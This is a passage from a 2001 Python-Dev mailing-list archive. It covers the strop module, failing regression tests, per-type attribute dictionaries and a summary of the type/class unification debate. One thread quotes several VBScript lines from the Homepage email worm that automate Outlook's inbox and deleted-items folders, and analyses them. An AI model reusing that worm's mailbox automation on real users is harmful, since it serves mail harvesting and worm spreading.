which Fred just removed.  Maybe Fred is working in an alternate
universe where test_mmap and test_pty are swapped.

Jeremy


From barry at digicool.com  Thu May 10 06:08:42 2001
From: barry at digicool.com (Barry A. Warsaw)
Date: Thu, 10 May 2001 00:08:42 -0400
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77
References: <LNBBLJKPBEHFEDALKOLCGEDHKBAA.tim@digicool.com>
	<LNBBLJKPBEHFEDALKOLCCEDIKBAA.tim.one@home.com>
Message-ID: <15098.5194.677531.35326@anthem.wooz.org>

>>>>> "TP" == Tim Peters <tim.one at home.com> writes:

    TP> Oh, fuck.  Somebody remind me why we have both stropmodule.c
    TP> and stringobject.c?  These bugs exist in both.

IIRC, I once proposed to share code bases through elaborate
#includes and exported functions, but that never went very far.
Guido's already pronounced on this, and I'd say good riddance to
strop.

>>>>> "GvR" == Guido van Rossum <guido at digicool.com> writes:

    GvR> Yes, but in the mean time the fact that it's buggy doesn't
    GvR> bother me at all.  Let it be as buggy as it always was --
    GvR> that's one more reason to stop using it! :-)
-----------------------------------^^^^

For a minute there, I thought you said "to strop using it". :)

-Barry


From fredrik at pythonware.com  Thu May 10 08:22:53 2001
From: fredrik at pythonware.com (Fredrik Lundh)
Date: Thu, 10 May 2001 08:22:53 +0200
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77
References: <LNBBLJKPBEHFEDALKOLCKEEBKBAA.tim.one@home.com>
Message-ID: <004001c0d919$a62de7d0$e46940d5@hagrid>

Tim Peters wrote:
> I think that's unsustainable in this specific case:  stringobject and
> stropmodule contained several utility functions with the same names that
> clearly started life as identical code.  Over time they got out of synch, and
> when they punched me in the face today, I had no idea which was "right" and
> which "wrong".  Turned out they both had the same bug, and the clearest way
> to fix it in stringobject.c without leaving a more inconsistent x-module mess
> was to bring the once-common utility routines back into synch.
> 
> As /F said, though, the mymemreplace() approach is inefficient and "should
> be" replaced wholesale.  If that's done in stringobject.c alone, great, then
> I won't care about the legacy routines in stropmodule.c either.

as a footnote, SRE uses the same source code to generate
both 8-bit and 16-bit versions of the match engine.  I see no
reason why we cannot do the same for the string operations
(PyString, PyUnicode, and strop).

if anyone wants me to look into this, just say "go ahead".  

> > no wonder u"".replace() is 30% faster than "".replace() ;-)
> 
> For a given number of characters or bytes <wink>?

characters.  judging from the SRE benchmarks, modern platforms
can process 16-bit characters as fast as they can process 8-bit
characters.

Cheers /F


From thomas at xs4all.net  Thu May 10 11:31:38 2001
From: thomas at xs4all.net (Thomas Wouters)
Date: Thu, 10 May 2001 11:31:38 +0200
Subject: [Python-Dev] Homepage
In-Reply-To: <200105091712.TAA05172@core.inf.ethz.ch>; from pedroni@inf.ethz.ch on Wed, May 09, 2001 at 07:12:20PM +0200
References: <200105091712.TAA05172@core.inf.ethz.ch>
Message-ID: <20010510113138.K16486@xs4all.nl>

On Wed, May 09, 2001 at 07:12:20PM +0200, Samuele Pedroni wrote:

> Set s=CreateObject("Outlook.Application")
> Set t=s.GetNameSpace("MAPI")
> Set u=t.GetDefaultFolder(6)

[..]

> Set u=t.GetDefaultFolder(3)

I know it's off-topic, but Greg started it! ;-) Does anyone know which
folders those two 'GetDefaultFolder' statements open ? I suspect it's
sent-mail and trash, or some such, but I don't know enough about Outlook to
know if it even *has* sent-mail and trash folders :)

Thanx for sending it through, Samuele, it was fun reading, and useful to our
helpdesk (especially the fact that it only sends out mails once, even though
it starts the porn page every time, and that it doesn't do anything harmful
at all.)

-- 
Thomas Wouters <thomas at xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From MarkH at ActiveState.com  Thu May 10 12:36:13 2001
From: MarkH at ActiveState.com (Mark Hammond)
Date: Thu, 10 May 2001 20:36:13 +1000
Subject: [Python-Dev] Homepage
In-Reply-To: <20010510113138.K16486@xs4all.nl>
Message-ID: <LCEPIIGDJPKCOIHOBJEPIEEPDMAA.MarkH@ActiveState.com>

> > Set u=t.GetDefaultFolder(6)
> > Set u=t.GetDefaultFolder(3)

> I know it's off-topic, but Greg started it! ;-) Does anyone know which
> folders those two 'GetDefaultFolder' statements open ? I suspect it's
> sent-mail and trash, or some such, but I don't know enough about
> Outlook to know if it even *has* sent-mail and trash folders :)

Running makepy.py over the Outlook type library yields the following:

	olFolderCalendar              =0x9        # from enum OlDefaultFolders
	olFolderContacts              =0xa        # from enum OlDefaultFolders
	olFolderDeletedItems          =0x3        # from enum OlDefaultFolders
	olFolderDrafts                =0x10       # from enum OlDefaultFolders
	olFolderInbox                 =0x6        # from enum OlDefaultFolders
	olFolderJournal               =0xb        # from enum OlDefaultFolders
	olFolderNotes                 =0xc        # from enum OlDefaultFolders
	olFolderOutbox                =0x4        # from enum OlDefaultFolders
	olFolderSentMail              =0x5        # from enum OlDefaultFolders
	olFolderTasks                 =0xd        # from enum OlDefaultFolders

So they appear to be the inbox and deleted items.

Mark.


From tim.one at home.com  Thu May 10 10:54:42 2001
From: tim.one at home.com (Tim Peters)
Date: Thu, 10 May 2001 04:54:42 -0400
Subject: [Python-Dev] test___all__ failing on WIndows
Message-ID: <LNBBLJKPBEHFEDALKOLCKEFAKBAA.tim.one@home.com>

> python  ../lib/test/regrtest.py test___all__

test___all__
test test___all__ failed -- tty has no __all__ attribute
1 test failed: test___all__

C:\Code\python\dist\src\PCbuild>

I assume this is yet another case where some excruciatingly non-obvious
sequence of failing imports manages to leave behind a damaged module object
in sys.modules that prevents test___all__'s import of tty from getting the
ImportError it *ought* to get under Windows (and betting termios is the
ultimate culprit).

I've fixed enough of these.  Somebody who thinks this is "a feature" gets to
do it this time <wink/snarl>.


From guido at digicool.com  Thu May 10 15:43:07 2001
From: guido at digicool.com (Guido van Rossum)
Date: Thu, 10 May 2001 08:43:07 -0500
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77
In-Reply-To: Your message of "Wed, 09 May 2001 22:00:30 -0400."
             <LNBBLJKPBEHFEDALKOLCKEEBKBAA.tim.one@home.com> 
References: <LNBBLJKPBEHFEDALKOLCKEEBKBAA.tim.one@home.com> 
Message-ID: <200105101343.IAA01450@cj20424-a.reston1.va.home.com>

> [Guido]
> > Yes, but in the mean time the fact that it's buggy doesn't bother
> > me at all.  Let it be as buggy as it always was -- that's one more
> > reason to stop using it! :-)

[Tim]
> I think that's unsustainable in this specific case: stringobject and
> stropmodule contained several utility functions with the same names
> that clearly started life as identical code.  Over time they got out
> of synch, and when they punched me in the face today, I had no idea
> which was "right" and which "wrong".  Turned out they both had the
> same bug, and the clearest way to fix it in stringobject.c without
> leaving a more inconsistent x-module mess was to bring the
> once-common utility routines back into synch.

Of course, the real bug was copy-and-paste programming.  The common
code should have been factored out rather than copied.

> As /F said, though, the mymemreplace() approach is inefficient and
> "should be" replaced wholesale.  If that's done in stringobject.c
> alone, great, then I won't care about the legacy routines in
> stropmodule.c either.  What I can't abide is having one copy of a
> function in the codebase work and a clone of it not work -- unless
> you can keep the undocumented history of both in your mind at all
> times, you're just as likely to bump into the broken one first when
> searching the code base, and if you're unlucky never even realize it
> is "the broken one" (or, if you're lucky, bump into the good one
> too, and then pee away time trying to understand the differences).

Here's an idea.  We remove stropmodule.c, and replace it with a
strop.py that issues a warning and then imports selected things from
string.py.

The only complication is that there are a few constants and one
function in strop that are still imported into string.py; I propose to
move these to an "internal" extension module (e.g. "_string").

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido at digicool.com  Thu May 10 16:02:59 2001
From: guido at digicool.com (Guido van Rossum)
Date: Thu, 10 May 2001 09:02:59 -0500
Subject: [Python-Dev] test_mmap failing?
In-Reply-To: Your message of "Wed, 09 May 2001 23:17:34 -0400."
             <15098.2126.368714.159135@slothrop.digicool.com> 
References: <LNBBLJKPBEHFEDALKOLCKEEDKBAA.tim.one@home.com>  
            <15098.2126.368714.159135@slothrop.digicool.com> 
Message-ID: <200105101402.JAA01678@cj20424-a.reston1.va.home.com>

> The latest CVS build works on my Linux 2.2.12 system.  No problem with
> test_mmap.  But test_pty does fail with some complaints about FCNTL,
> which Fred just removed.  Maybe Fred is working in an alternate
> universe where test_mmap and test_pty are swapped.

Strange.  They *both* work for me with the latest CVS (and even after
removing all *.pyc files!), although last night (?) I recall seeing a
test_pty failure too.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From skip at pobox.com  Thu May 10 16:16:24 2001
From: skip at pobox.com (skip at pobox.com)
Date: Thu, 10 May 2001 09:16:24 -0500
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77
In-Reply-To: <200105100227.VAA00607@cj20424-a.reston1.va.home.com>
References: <LNBBLJKPBEHFEDALKOLCGEDOKBAA.tim.one@home.com>
	<200105100227.VAA00607@cj20424-a.reston1.va.home.com>
Message-ID: <15098.41656.128146.826459@beluga.mojam.com>

    Guido> Yes, but in the mean time the fact that it's buggy doesn't bother
    Guido> me at all.  Let it be as buggy as it always was -- that's one
    Guido> more reason to stop using it! :-)

In fact, perhaps the import warning could mention that strop is buggy and
won't be fixed... :-)

Skip


From skip at pobox.com  Thu May 10 16:32:15 2001
From: skip at pobox.com (skip at pobox.com)
Date: Thu, 10 May 2001 09:32:15 -0500
Subject: [Python-Dev] test___all__ failing on WIndows
In-Reply-To: <LNBBLJKPBEHFEDALKOLCKEFAKBAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCKEFAKBAA.tim.one@home.com>
Message-ID: <15098.42607.84670.323361@beluga.mojam.com>

    >> python  ../lib/test/regrtest.py test___all__
    Tim> test___all__
    Tim> test test___all__ failed -- tty has no __all__ attribute
    Tim> 1 test failed: test___all__

grumble, grumble...

    Tim> I assume this is yet another case where some excruciatingly
    Tim> non-obvious sequence of failing imports manages to leave behind a
    Tim> damaged module object in sys.modules that prevents test___all__'s
    Tim> import of tty from getting the ImportError it *ought* to get under
    Tim> Windows (and betting termios is the ultimate culprit).

I (thankfully) gave up even pretending to run Windows recently, so I can
only make a suggestion for others who look into this problem.  Try this:
Change test___all__.check_all so that the except clause reads:

    except ImportError, msg:

then print out msg when an import fails.  You should get the actual module
that failed to import.  If foo.py consists of simply "import bar", and I
import it, I see that bar couldn't be imported:

    >>> try:
    ...   import foo
    ... except ImportError, msg:
    ...   print msg
    ... 
    No module named bar
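Skip's suggestion carries over to Python 3, where the syntax is "except ImportError as exc:". The sketch below is a hypothetical stand-alone helper, not the real test___all__.check_all. It reports the ImportError text separately from a missing __all__. That text names the module that actually failed, which may be a dependency such as termios rather than tty itself.

```python
import importlib


def check_all(modname):
    """Return a diagnostic string, or None if modname imports and has __all__."""
    try:
        mod = importlib.import_module(modname)
    except ImportError as exc:
        # str(exc) names the module that really failed, which may be a
        # dependency of modname rather than modname itself.
        return "import of %s failed: %s" % (modname, exc)
    if not hasattr(mod, "__all__"):
        return "%s has no __all__ attribute" % modname
    return None


for name in ("json", "sys", "no_such_module_xyz"):
    print(name, "->", check_all(name))
```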

Skip


From fdrake at acm.org  Thu May 10 16:57:59 2001
From: fdrake at acm.org (Fred L. Drake, Jr.)
Date: Thu, 10 May 2001 10:57:59 -0400 (EDT)
Subject: [Python-Dev] Re: test_mmap failing?
In-Reply-To: <LNBBLJKPBEHFEDALKOLCKEEDKBAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCKEEDKBAA.tim.one@home.com>
Message-ID: <15098.44151.714757.997613@cj42289-a.reston1.va.home.com>

Tim Peters writes:
 > But having suffered too many "impossible problems" the last 36 hours, my
 > confidence is shot <0.93 wink>.  Is test_mmap failing for anyone else under
 > current CVS?  Fred, are you *sure* it fails for you -- if so, does the
 > problem actually go away if you revert mmapmodule.c?

  It was indeed showing the behavior I described!  I figured out what
it was this morning and closed the patch again.
  The problem, of course(!), had nothing to do with mmap, before or
after any of the recent changes to mmap.  Or any old changes.  It had
a lot to do with the change I made to the socket module.  ;-)
  While figuring out the reported bug in the socket module, I created
named pipes, including one named "foo".  The mmap test opens a file
"foo" with mode "w+" in the directory in which I just happened to
create the named pipe, so it ended up with a file object opened on a
pipe -- things just don't work the same for these beasts!  Needless to
say, test_mmap failed with a cryptic error message.
  This raises the question, though -- should tests that create temp
files check that the files don't already exist, and fail with a more
descriptive error if they do?
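Below is one way to get the more descriptive failure Fred asks about, sketched in modern Python 3. It creates the file with exclusive mode "x", which refuses to open any existing path, a named pipe included. It then reports what is already sitting at that path. The helper names open_fresh_test_file and _describe are hypothetical. Using tempfile.mkstemp() or a fresh temporary directory would avoid the collision altogether.

```python
import os
import stat


def _describe(path):
    """Say what kind of object already occupies path."""
    try:
        mode = os.lstat(path).st_mode
    except OSError:
        return "something"  # vanished or unreadable since the open failed
    if stat.S_ISFIFO(mode):
        return "named pipe"
    if stat.S_ISDIR(mode):
        return "directory"
    if stat.S_ISREG(mode):
        return "regular file"
    return "special file"


def open_fresh_test_file(path):
    """Create path for a test; fail descriptively if it already exists."""
    try:
        return open(path, "x+")  # "x" = exclusive creation, "+" = read/write
    except FileExistsError:
        raise RuntimeError("test file %r already exists (it is a %s); "
                           "remove it or pick another name"
                           % (path, _describe(path))) from None
```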


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From fdrake at acm.org  Thu May 10 16:59:08 2001
From: fdrake at acm.org (Fred L. Drake, Jr.)
Date: Thu, 10 May 2001 10:59:08 -0400 (EDT)
Subject: [Python-Dev] test_mmap failing?
In-Reply-To: <15098.2126.368714.159135@slothrop.digicool.com>
References: <LNBBLJKPBEHFEDALKOLCKEEDKBAA.tim.one@home.com>
	<15098.2126.368714.159135@slothrop.digicool.com>
Message-ID: <15098.44220.515660.330116@cj42289-a.reston1.va.home.com>

Jeremy Hylton writes:
 > The latest CVS build works on my Linux 2.2.12 system.  No problem with
 > test_mmap.  But test_pty does fail with some complaints about FCNTL,
 > which Fred just removed.  Maybe Fred is working in an alternate
 > universe where test_mmap and test_pty are swapped.

  Or, I could just be working in an alternate universe altogether.
I've been known to do that....


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From paulp at ActiveState.com  Thu May 10 23:55:36 2001
From: paulp at ActiveState.com (Paul Prescod)
Date: Thu, 10 May 2001 14:55:36 -0700
Subject: [Python-Dev] Type/class
Message-ID: <3AFB0E58.1F0ABCA6@ActiveState.com>

-------- Original Message --------
Log Message:

Make attributes of subtypes writable, but only for dynamic subtypes
derived in Python using a class statement; static subtypes derived in
C still have read-only attributes.
-------- Original Message --------

I would like to argue that "plain old C types" should act as if they
have __dict__s for consistency with other types. It is sometimes useful
to be able to annotate objects by adding attributes to them. But this
only works with class instance objects, not instances of types.
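The asymmetry Paul describes is easy to see in modern Python 3. A Python-level subclass of a built-in type gets a per-instance __dict__ by default, while instances of the built-in type itself do not. Below is a minimal sketch; the class names and the try_annotate() helper are illustrative only.

```python
def try_annotate(obj, name="note", value="checked"):
    """Try to attach an ad-hoc attribute; return True if it sticks."""
    try:
        setattr(obj, name, value)
    except AttributeError:
        return False
    return getattr(obj, name) == value


class AnnotatableInt(int):
    """Subclass defined with a class statement: instances get a __dict__."""


class SlottedInt(int):
    """Empty __slots__ suppresses the per-instance __dict__ again."""
    __slots__ = ()


print(try_annotate(42))                  # False: plain int has no __dict__
print(try_annotate(AnnotatableInt(42)))  # True
print(try_annotate(SlottedInt(42)))      # False
```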

 Paul Prescod


From jeremy at digicool.com  Thu May 10 23:59:34 2001
From: jeremy at digicool.com (Jeremy Hylton)
Date: Thu, 10 May 2001 17:59:34 -0400 (EDT)
Subject: [Python-Dev] Type/class
In-Reply-To: <3AFB0E58.1F0ABCA6@ActiveState.com>
References: <3AFB0E58.1F0ABCA6@ActiveState.com>
Message-ID: <15099.3910.648127.25900@slothrop.digicool.com>

>>>>> "PP" == Paul Prescod <paulp at ActiveState.com> writes:

  PP> I would like to argue that "plain old C types" should act as if
  PP> they have __dict__s for consistency with other types. It is
  PP> sometimes useful to be able to annotate objects by adding
  PP> attributes to them. But this only works with class instance
  PP> objects, not instances of types.

Every type should have an __dict__ of type dict?  Then every dict
must have an __dict__, including the __dict__ of __dict__?

Once every object has an __dict__, every object will be mutable.  Then
no object will be usable as a dict key and we can get rid of dicts
entirely.

Jeremy


From fdrake at cj42289-a.reston1.va.home.com  Fri May 11 00:47:14 2001
From: fdrake at cj42289-a.reston1.va.home.com (Fred Drake)
Date: Thu, 10 May 2001 18:47:14 -0400 (EDT)
Subject: [Python-Dev] [maintenance doc updates]
Message-ID: <20010510224714.15E4328946@cj42289-a.reston1.va.home.com>

The development version of the documentation has been updated:

	http://python.sourceforge.net/maint-docs/

Incremental update for the maintenance version docs.


From fdrake at cj42289-a.reston1.va.home.com  Fri May 11 01:04:40 2001
From: fdrake at cj42289-a.reston1.va.home.com (Fred Drake)
Date: Thu, 10 May 2001 19:04:40 -0400 (EDT)
Subject: [Python-Dev] [development doc updates]
Message-ID: <20010510230440.30DB228946@cj42289-a.reston1.va.home.com>

The development version of the documentation has been updated:

	http://python.sourceforge.net/devel-docs/

Incremental update for the development version of the docs.


From guido at digicool.com  Fri May 11 02:03:13 2001
From: guido at digicool.com (Guido van Rossum)
Date: Thu, 10 May 2001 19:03:13 -0500
Subject: [Python-Dev] Type/class
In-Reply-To: Your message of "Thu, 10 May 2001 14:55:36 MST."
             <3AFB0E58.1F0ABCA6@ActiveState.com> 
References: <3AFB0E58.1F0ABCA6@ActiveState.com> 
Message-ID: <200105110003.TAA02924@cj20424-a.reston1.va.home.com>

Glad somebody is watching what I'm doing here -- I was afraid I was
having too much fun by myself! :-)

> -------- Original Message --------
> Log Message:
> 
> Make attributes of subtypes writable, but only for dynamic subtypes
> derived in Python using a class statement; static subtypes derived in
> C still have read-only attributes.
> -------- Original Message --------
> 
> I would like to argue that "plain old C types" should act as if they
> have __dict__s for consistency with other types.

Good point.  Plain old types currently (in the descr-branch) have a
readonly dict (using a proxy) and no settable attributes.  I will
probably give types settable attributes in a next revision, but I
prefer not to make the type's dict writable -- I need to be able to
watch the setattr calls so that if someone changes
DictType.__getitem__ I can change the mp_subscript to a C function
that calls the __getitem__ method.  For speed reasons, if you don't
override them, the C tp_slot functions carry out the operation
directly, and the __slot__ methods call the C tp_slot functions; but
when __slot__ is overridden, tp_slot must call __slot__.
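As a rough illustration in present-day Python (not the descr-branch code under discussion), the observable effect of this design is that overriding __getitem__ in a dict subclass reroutes subscription through the Python method, while other C methods such as dict.get keep calling the C lookup directly. LoudDict is a hypothetical name used only for this sketch.

```python
class LoudDict(dict):
    """A dict subclass that overrides __getitem__ at the Python level."""

    def __getitem__(self, key):
        # d[key] is now routed through this Python method.
        return "overridden:" + str(dict.__getitem__(self, key))


d = LoudDict(a=1)
print(d["a"])                    # overridden:1  (slot calls the override)
print(d.get("a"))                # 1  (dict.get uses the C lookup directly)
print(dict.__getitem__(d, "a"))  # 1  (explicit call to the base method)
```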

> It is sometimes useful
> to be able to annotate objects by adding attributes to them. But this
> only works with class instance objects, not instances of types.
> 
>  Paul Prescod

If you're talking about *instances*: instances of subtypes of built-in
types have a dict of their own to which you can add stuff to your
heart's content.  Instances of built-in types will continue not to
have a dict (it would cost too much space if *every* object had a
dict, even if it was a NULL pointer when no attrs are defined).

If you mean you want to annotate types like you can annotate classes,
that should be possible once I implement what I describe above.
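A short sketch of the distinction in later Python releases, assuming Python 3: a plain dict instance cannot take new attributes, an instance of a dict subclass gets its own __dict__, and a subclass that declares __slots__ = () gives the per-instance dict up again to save space. The class names are made up for illustration.

```python
class AnnotatedDict(dict):
    """Subclass of a built-in type: instances get a per-instance __dict__."""


class CompactDict(dict):
    # An empty __slots__ suppresses the per-instance __dict__ again.
    __slots__ = ()


plain = {}
try:
    plain.note = "hello"           # built-in instance: no __dict__ to store it in
except AttributeError:
    print("plain dict: cannot annotate")

sub = AnnotatedDict()
sub.note = "hello"                 # stored in sub.__dict__
print(sub.__dict__)                # {'note': 'hello'}

compact = CompactDict()
print(hasattr(compact, "__dict__"))  # False
```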

--Guido van Rossum (home page: http://www.python.org/~guido/)


From paulp at ActiveState.com  Fri May 11 01:22:16 2001
From: paulp at ActiveState.com (Paul Prescod)
Date: Thu, 10 May 2001 16:22:16 -0700
Subject: [Python-Dev] Type/class
References: <3AFB0E58.1F0ABCA6@ActiveState.com> <15099.3910.648127.25900@slothrop.digicool.com>
Message-ID: <3AFB22A8.A0A6A4D4@ActiveState.com>

Jeremy Hylton wrote:
> 
> >>>>> "PP" == Paul Prescod <paulp at ActiveState.com> writes:
> 
>   PP> I would like to argue that "plain old C types" should act as if
>   PP> they have __dict__s for consistency with other types. It is
>   PP> sometimes useful to be able to annotate objects by adding
>   PP> attributes to them. But this only works with class instance
>   PP> objects, not instances of types.
> 
> Every type should have an __dict__ of type dict?  Then every dict
> must have an __dict__, including the __dict__ of __dict__?

What's wrong with that? Every object has a type, even type objects, and
type types. It only becomes a problem if you try to recursively walk all
the dictionaries in the system adding information to them. Otherwise
they have null pointers that "act as if" they were empty dictionaries.

> Once every object has an __dict__, every object will be mutable.  Then
> no object will be usable as a dict key and we can get rid of dicts
> entirely.

According to that argument, instances cannot be dictionary keys. That is
simply not true. Objects do not implement their hash functions in terms
of ALL of their attributes!
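To make Paul's point concrete: a class can define __hash__ and __eq__ over a fixed subset of its fields, so annotating an instance with extra attributes leaves its hash unchanged. Point is a hypothetical example class, and the sketch assumes Python 3.

```python
class Point:
    """Hash and equality depend only on x and y, not on other attributes."""

    def __init__(self, x, y):
        self.x = x
        self.y = y

    def __eq__(self, other):
        return isinstance(other, Point) and (self.x, self.y) == (other.x, other.y)

    def __hash__(self):
        # Only the identifying fields take part in the hash.
        return hash((self.x, self.y))


p = Point(1, 2)
table = {p: "found"}
p.label = "annotated later"    # new attribute; hash is unaffected
print(table[Point(1, 2)])      # found
```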

-- 
Take a recipe. Leave a recipe.  
Python Cookbook!  http://www.ActiveState.com/pythoncookbook


From mwh at python.net  Fri May 11 01:31:53 2001
From: mwh at python.net (Michael Hudson)
Date: Fri, 11 May 2001 00:31:53 +0100 (BST)
Subject: [Python-Dev] python-dev summary 2001-04-26 - 2001-05-10
Message-ID: <Pine.LNX.4.30.0105110031170.14911-100000@localhost.localdomain>

 This is a summary of traffic on the python-dev mailing list between
 Apr 26 and May 9 (inclusive) 2001.  It is intended to inform the
 wider Python community of ongoing developments.  To comment, just
 post to python-list at python.org or comp.lang.python in the usual
 way. Give your posting a meaningful subject line, and if it's about a
 PEP, include the PEP number (e.g. Subject: PEP 201 - Lockstep
 iteration). All python-dev members are interested in seeing ideas
 discussed by the community, so don't hesitate to take a stance on a
 PEP if you have an opinion.

 This is the seventh summary written by Michael Hudson.
 Summaries are archived at:

  <http://starship.python.net/crew/mwh/summaries/>

   Posting distribution (with apologies to mbm)

   Number of articles in summary: 228

    40 |                         [|]
       |                         [|]
       |                         [|]
       |                         [|]                         [|]
       |                         [|]                         [|]
    30 |                         [|]                         [|]
       |                         [|]                         [|]
       |                         [|]                         [|]
       |                         [|]                         [|]
       |                         [|]                         [|]
    20 |     [|]                 [|] [|]                     [|]
       |     [|]                 [|] [|]                     [|]
       |     [|]                 [|] [|] [|]                 [|]
       |     [|]                 [|] [|] [|]             [|] [|]
       |     [|]                 [|] [|] [|]             [|] [|]
    10 |     [|]                 [|] [|] [|]         [|] [|] [|]
       |     [|] [|]     [|] [|] [|] [|] [|] [|]     [|] [|] [|]
       | [|] [|] [|]     [|] [|] [|] [|] [|] [|]     [|] [|] [|]
       | [|] [|] [|]     [|] [|] [|] [|] [|] [|]     [|] [|] [|]
       | [|] [|] [|]     [|] [|] [|] [|] [|] [|]     [|] [|] [|]
     0 +-007-024-010-001-010-010-044-023-019-010-002-012-017-039
        Thu 26| Sat 28| Mon 30| Wed 02| Fri 04| Sun 06| Tue 08|
            Fri 27  Sun 29  Tue 01  Thu 03  Sat 05  Mon 07  Wed 09

  A fairly quiet, but interesting fortnight (and I don't mean the
  sarcastic replies to the Homepage virus).  A few build problems and
  bugs fixed, and one very involved discussion (cf. most of the rest
  of this summary).


    * type == class? *

 Guido posted a message from Jim Althoff describing the metaclass
 system used in Smalltalk:

  <http://mail.python.org/pipermail/python-dev/2001-May/014508.html>

 He also mentioned a problem that is bound to bite any attempt to heal
 the type/class split in Python.  If there are to be no special cases
 in the type system then classes and types in particular should be
 instances.  This sounds innocuous, but consider:

    class MyDictType(DictType):
        def __repr__(self):
            return "MyDictType(%s)" % DictType.__repr__(self)

 The code is hoping that, as in today's Python, DictType.__repr__ will
 return an unbound method - the __repr__ method of vanilla
 dictionaries, so that output of the form

    MyDictType({1:2})

 will be given.  But DictType is now an instance, so there's another
 interpretation for DictType.__repr__ - the bound DictType's own
 __repr__ method!  This is a fundamental problem; currently
 "class.attr" and "instance.attr" have different meanings in Python,
 and any attempt to conflate the notions of "class" and "instance" is
 bound to run aground.  Guido proposed some hairy disambiguation rules
 in the above-linked message, but no-one was particularly enthused
 about them, possibly because no-one could really get their head round
 them.
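For comparison only, this is how the Python that eventually shipped resolves the ambiguity (a later design, not the rules Guido posted): looking up an attribute on a class searches the class and its bases first, so dict.__repr__ is the method for dict instances, while repr(dict) goes through the metaclass, type. The sketch assumes Python 3 and uses dict in place of DictType.

```python
class MyDictType(dict):
    def __repr__(self):
        # dict.__repr__ is found on dict itself, so this is the method for
        # dict instances, not type's __repr__ bound to the dict class.
        return "MyDictType(%s)" % dict.__repr__(self)


print(repr(MyDictType({1: 2})))   # MyDictType({1: 2})
print(repr(dict))                 # <class 'dict'>  (via type(dict).__repr__)
print(type(dict).__repr__(dict))  # <class 'dict'>
```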

 The long term solution is to change the syntax for getting - or
 removing entirely - unbound methods.  As far as anyone can make out,
 all that unbound methods are used for is calling superclasses' methods
 from overriding methods, so if one can find another way of spelling
 that, then removing unbound methods entirely could be contemplated.
 So the discussion on that went around for a bit, with no really new
 compelling ideas surfacing.  There was some support for some kind of
 souped up super.foo() construct:

  <http://mail.python.org/pipermail/python-dev/2001-May/014523.html>
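Python did later grow a built-in super() (the zero-argument form is Python 3 only); it is not the exact super.foo() spelling from the thread, but it covers the main use of unbound methods described above without naming the base class. A minimal sketch, again using dict in place of DictType:

```python
class MyDictType(dict):
    def __repr__(self):
        # super() finds the next __repr__ in the MRO (here dict's),
        # so the base class does not have to be named explicitly.
        return "MyDictType(%s)" % super().__repr__()


print(repr(MyDictType({1: 2})))   # MyDictType({1: 2})
```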

 To me, the most plausible ideas came from Thomas Heller:

  <http://mail.python.org/pipermail/python-dev/2001-May/014517.html>

 and from Paul Dubois, who suggested nicking the feature renaming
 feature from Eiffel:

  <http://mail.python.org/pipermail/python-dev/2001-May/014573.html>

 though the best syntax for the latter is far from clear.

 There's also the king-sized issue of backwards compatibility; to a
 first degree of approximation, *all* Python code that uses
 inheritance would need to be updated to accommodate changes in the
 meaning of "class.attribute".  Another __future__ statement, maybe?


    * data.decode *

 Marc-Andre Lemburg asked if it might be an idea if string objects
 sprouted an .decode method:

  <http://mail.python.org/pipermail/python-dev/2001-May/014547.html>

 After some umming and arring and accusations of bloat, this got BDFL
 approval, and should appear in CVS imminently.


    * Moving MacPython to sourceforge *

 Jack Jansen posted notice that he intends to move the MacPython code
 over to sourceforge:

  <http://mail.python.org/pipermail/python-dev/2001-May/014611.html>

 It will be nice to finally have all the code in the same place!

Cheers,
M.


From paulp at ActiveState.com  Fri May 11 02:26:43 2001
From: paulp at ActiveState.com (Paul Prescod)
Date: Thu, 10 May 2001 17:26:43 -0700
Subject: [Python-Dev] Type/class
References: <3AFB0E58.1F0ABCA6@ActiveState.com> <200105110003.TAA02924@cj20424-a.reston1.va.home.com>
Message-ID: <3AFB31C3.5CEF9064@ActiveState.com>

Guido van Rossum wrote:
> 
>...
> 
> Good point.  Plain old types currently (in the descr-branch) have a
> readonly dict (using a proxy) and no settable attributes.  I will
> probably give types settable attributes in a next revision, but I
> prefer not to make the type's dict writable -- I need to be able to
> watch the setattr calls so that if someone changes
> DictType.__getitem__ I can change the mp_subscript to a C function
> that calls the __getitem__ method.  

I'm happy to have you look and see if I'm setting something magical. But
if I'm not, I would like you to just add the thing I made to an internal
private dictionary and remember it. I think that's what you are talking
about.

>...
> If you're talking about *instances*: instances of subtypes of built-in
> types have a dict of their own to which you can add stuff to your
> heart's content.  Instances of built-in types will continue not to
> have a dict (it would cost too much space if *every* object had a
> dict, even if it was a NULL pointer when no attrs are defined).

Darn. That *is* what I was hoping for.

There is an implementation that is slowish if you use it, but has little
cost if you don't: keep a big dict mapping object pointers to their
associated dictionaries (if any). For purposes of discussion, call it
sys._associations. Then have the getattr on "PyObject" look in this dict
of dicts for attributes that it can't otherwise find, and setattr
construct dictionaries in the dict of dicts if necessary.

That's the usual workaround anyhow, so this would give a nicer syntax and a
more orthogonal model.

Price: a hasattr that would return false or getattr that would raise
AttributeError would be a little slower. They would have to check the
dictionary of dictionaries before deciding that they really don't have
the attribute.
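A rough Python-level sketch of the side-table idea, using only built-ins. AssociationRegistry and its methods are hypothetical names. The sketch keys entries by id(obj) while holding a strong reference to each annotated object, so an id cannot be recycled for a different object; the flip side is that annotated objects are never freed. Only lookups that miss on the object itself pay for the extra dictionary probe, which is the cost Paul describes.

```python
class AssociationRegistry:
    """Hypothetical side table that attaches attribute dicts to any object."""

    def __init__(self):
        # id(obj) -> (obj, {name: value}); keeping obj alive pins its id.
        self._entries = {}

    def set_attr(self, obj, name, value):
        entry = self._entries.get(id(obj))
        if entry is None:
            # Create the per-object dict lazily, on first use only.
            entry = (obj, {})
            self._entries[id(obj)] = entry
        entry[1][name] = value

    def get_attr(self, obj, name):
        # Ordinary lookup first; the side table is consulted only on a miss.
        try:
            return getattr(obj, name)
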